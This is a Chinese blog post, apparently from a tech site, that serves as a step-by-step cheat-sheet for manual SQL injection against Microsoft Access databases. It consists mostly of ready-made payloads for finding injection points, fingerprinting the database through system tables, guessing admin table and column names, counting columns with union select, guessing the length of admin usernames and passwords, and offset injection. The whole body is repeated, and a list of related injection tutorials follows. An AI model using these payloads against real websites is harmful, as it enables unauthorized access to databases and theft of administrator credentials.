access数据库的手工注入
2018-08-20 21:35
585 查看
access数据库
优势:提高速度和减少代码量
缺点:数据过大性能下降,安全性低
后缀名:.mdb
打开工具:辅臣数据库浏览器,破障浏览器
access注入
判断注入点:‘ ,and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号,报错有注入点
判断数据库类型:and exists(select * from msysobjects)>0 存在说明是access数据库 , and exists(select * from sysobjects)>0 存在说明是sql server数据库
判断数据库中的表:and exists(select * from admin) 返回成功说明存在
access的数据库中的表:admin,msysobjects,user,username,
判断数据库中表内的字段名:and exists(select username from admin) 返回成功说明存在
判断字段长度:order by N
报错:and 1=2 union select 1,2,....,N from admin(联合查询)
判断账户密码长度:and (select len(admin) from admin)=5 如果返回正常说明管理账户的长度为5
and (select len(password) from admin)=5 猜解管理密码长度是5
![](http://s1.51cto.com/images/20180820/1534772051874283.gif?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
偏移注入
主要用来解决表名猜到,列名猜不到的情况
and 1=2 union select 1,2,....,N from admin(联合查询),用*从最后一个字段向前逐个代替,直到显示正常为止,*代表所有数据表内的字段
![](http://s1.51cto.com/images/20180820/1534772064849265.gif?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
优势:提高速度和减少代码量
缺点:数据过大性能下降,安全性低
后缀名:.mdb
打开工具:辅臣数据库浏览器,破障浏览器
access注入
判断注入点:‘ ,and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号,报错有注入点
判断数据库类型:and exists(select * from msysobjects)>0 存在说明是access数据库 , and exists(select * from sysobjects)>0 存在说明是sql server数据库
判断数据库中的表:and exists(select * from admin) 返回成功说明存在
access的数据库中的表:admin,msysobjects,user,username,
判断数据库中表内的字段名:and exists(select username from admin) 返回成功说明存在
判断字段长度:order by N
报错:and 1=2 union select 1,2,....,N from admin(联合查询)
判断账户密码长度:and (select len(admin) from admin)=5 如果返回正常说明管理账户的长度为5
and (select len(password) from admin)=5 猜解管理密码长度是5
![](http://s1.51cto.com/images/20180820/1534772051874283.gif?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
偏移注入
主要用来解决表名猜到,列名猜不到的情况
and 1=2 union select 1,2,....,N from admin(联合查询),用*从最后一个字段向前逐个代替,直到显示正常为止,*代表所有数据表内的字段
![](http://s1.51cto.com/images/20180820/1534772064849265.gif?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
![](http://s1.51cto.com/images/20180820/1534772073433683.gif?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
相关文章推荐
- SQL注入原理-手工注入access数据库
- SQL注入原理 手工注入access数据库
- mysql 手工注入讲解
- 注入命令 手工注入命令大全
- 记一次有意义的asp手工注入
- 手工注入命令 推荐
- SQL手工注入语句
- 扔掉工具,让你飞速学会手工注入
- 脚本入侵 手工注入ASP
- MSSQL与MYSQL手工注入时的简单对比
- SQL注入(手工注入)
- php手工注入拿后台
- [转] sql注入之手工注入示例详解
- 手工入侵指定网站步骤【ACCESS数据库】
- mysql 手工注入某高校网站
- Mysql数据库的mysql Schema 到底有哪些东西& 手工注入的基础要领
- MSSQL手工注入
- mysql手工注入总结
- 扔掉工具,让你飞速学会手工注入
- MSSQL显错模式的手工注入实现原理思考和实战